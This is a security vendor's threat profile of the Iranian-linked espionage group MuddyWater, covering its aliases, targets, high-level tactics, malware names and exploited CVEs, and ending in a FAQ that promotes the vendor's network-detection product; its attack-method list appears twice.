MuddyWater
MuddyWater is an Iranian-linked cyber espionage group active since at least 2017, known for targeting global government, telecommunications, defense, and energy sectors through sophisticated spear-phishing and exploitation techniques.
The Origin of MuddyWater
MuddyWater, also known as STATIC KITTEN, Earth Vetala, MERCURY, Seedworm, Mango Sandstorm, and TEMP.Zagros, is an advanced persistent threat (APT) group identified as part of Iran’s Ministry of Intelligence and Security (MOIS). Active since at least 2017, MuddyWater specializes in cyber espionage operations, utilizing a variety of sophisticated techniques and custom malware for its campaigns. The group is notably adaptive, consistently evolving tactics and malware to evade detection and defenses.
Targeted Countries
MuddyWater’s victims span globally, particularly in the Middle East, Eurasia, and Central Asia, prominently targeting Turkey, Tajikistan, the Netherlands, Azerbaijan, Armenia, Pakistan, Iraq, Oman, Saudi Arabia, United Arab Emirates, Syria, Afghanistan, India, Jordan, Israel, Palestine, Turkmenistan, Georgia, Malta, Germany, and the United States. Such geographic diversity demonstrates their extensive international espionage campaigns.
Targeted Industries
MuddyWater has conducted operations against diverse sectors including government entities, military organizations, telecommunications, academia, oil and gas, aviation, healthcare, NGOs, technology, financial services, hospitality, agriculture, energy, pharmaceuticals, real estate, aerospace, and local governments. The broad targeting indicates a strategic interest in sectors critical to national infrastructure and information control.
Known Victims
Specific known attacks include recent campaigns (2025) against multiple Israeli academic institutions, reflecting a sustained interest in Middle Eastern political dynamics. Additionally, governmental, defense, telecommunications, and energy organizations in various countries have been repeatedly targeted over the group's operational history.
MuddyWater's Attack Method
Primarily via targeted spear-phishing emails (attachments or malicious links), compromised third-party accounts, or exploitation of known vulnerabilities in Microsoft Exchange and Office products.
MuddyWater abuses User Account Control (UAC) mechanisms and performs DLL side-loading techniques for elevated access.
Implements obfuscation methods including Base64 encoding, steganography, and usage of legitimate tools (LOLBins) like CMSTP, Mshta, and Rundll32.
Employs credential dumping tools like Mimikatz, LaZagne, and Browser64 to extract credentials from LSASS memory, web browsers, email clients, and cached domain credentials.
Uses scripts and custom malware for account enumeration, file and directory scanning, and software discovery, including security products.
Utilizes legitimate remote access solutions such as Remote Utilities, SimpleHelp, Atera Agent, and ScreenConnect to move laterally within compromised networks.
Screenshots capturing and staged archiving of data using native utilities (makecab.exe) are standard practices.
Deploys payloads executed through PowerShell, Windows Command Shell, VBScript, Python, JavaScript, and leveraging remote access tools.
Exfiltrates data via command-and-control (C2) channels using encrypted and obfuscated communications over HTTP/DNS protocols.
Primary goal includes cyber espionage resulting in the theft of sensitive, strategic, and classified information rather than disruptive attacks.
Primarily via targeted spear-phishing emails (attachments or malicious links), compromised third-party accounts, or exploitation of known vulnerabilities in Microsoft Exchange and Office products.
MuddyWater abuses User Account Control (UAC) mechanisms and performs DLL side-loading techniques for elevated access.
Implements obfuscation methods including Base64 encoding, steganography, and usage of legitimate tools (LOLBins) like CMSTP, Mshta, and Rundll32.
Employs credential dumping tools like Mimikatz, LaZagne, and Browser64 to extract credentials from LSASS memory, web browsers, email clients, and cached domain credentials.
Uses scripts and custom malware for account enumeration, file and directory scanning, and software discovery, including security products.
Utilizes legitimate remote access solutions such as Remote Utilities, SimpleHelp, Atera Agent, and ScreenConnect to move laterally within compromised networks.
Screenshots capturing and staged archiving of data using native utilities (makecab.exe) are standard practices.
Deploys payloads executed through PowerShell, Windows Command Shell, VBScript, Python, JavaScript, and leveraging remote access tools.
Exfiltrates data via command-and-control (C2) channels using encrypted and obfuscated communications over HTTP/DNS protocols.
Primary goal includes cyber espionage resulting in the theft of sensitive, strategic, and classified information rather than disruptive attacks.
TTPs Used by MuddyWater
How to Detect MuddyWater with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate an APT attack.
FAQs
Who is behind MuddyWater?
MuddyWater is attributed to Iran’s Ministry of Intelligence and Security (MOIS).
What are MuddyWater’s primary attack vectors?
They use spear-phishing emails with malicious attachments and links and exploitation of public-facing vulnerabilities.
How does MuddyWater evade defenses?
They employ various obfuscation methods, legitimate tools, steganography, and DLL side-loading.
Which malware tools are associated with MuddyWater?
POWERSTATS, NTSTATS, CloudSTATS, PowGoop, Blackwater, ForeLord, MoriAgent, and others.
Which industries does MuddyWater target?
Telecommunications, defense, academia, oil and gas, healthcare, technology, NGOs, and government entities.
Which tools can detect MuddyWater’s activities?
Organizations should leverage advanced Network Detection and Response (NDR) solutions like Vectra AI.
What can organizations do to defend against MuddyWater attacks?
Organizations should apply security patches promptly, educate users on spear-phishing awareness, enforce multifactor authentication, and monitor network traffic and user activity closely.
Does MuddyWater leverage vulnerabilities?
Yes, they exploit vulnerabilities like CVE-2020-0688 (Microsoft Exchange), CVE-2017-0199 (Office), and CVE-2020-1472 (Netlogon).
Does MuddyWater have global reach?
Yes, while primarily active in Middle East and Asia, MuddyWater targets entities worldwide including North America and Europe.
How can an organization detect MuddyWater’s lateral movement?
Organizations can effectively detect lateral movement associated with MuddyWater by utilizing advanced Network Detection and Response (NDR) solutions such as Vectra AI. Vectra AI leverages artificial intelligence and machine learning algorithms to continuously monitor network traffic, quickly identifying abnormal behaviors like unauthorized remote access tool usage, suspicious internal connections, and unexpected credential usage patterns. By providing real-time visibility and prioritized threat alerts, Vectra AI empowers security teams to rapidly identify and contain threats posed by MuddyWater before significant damage occurs.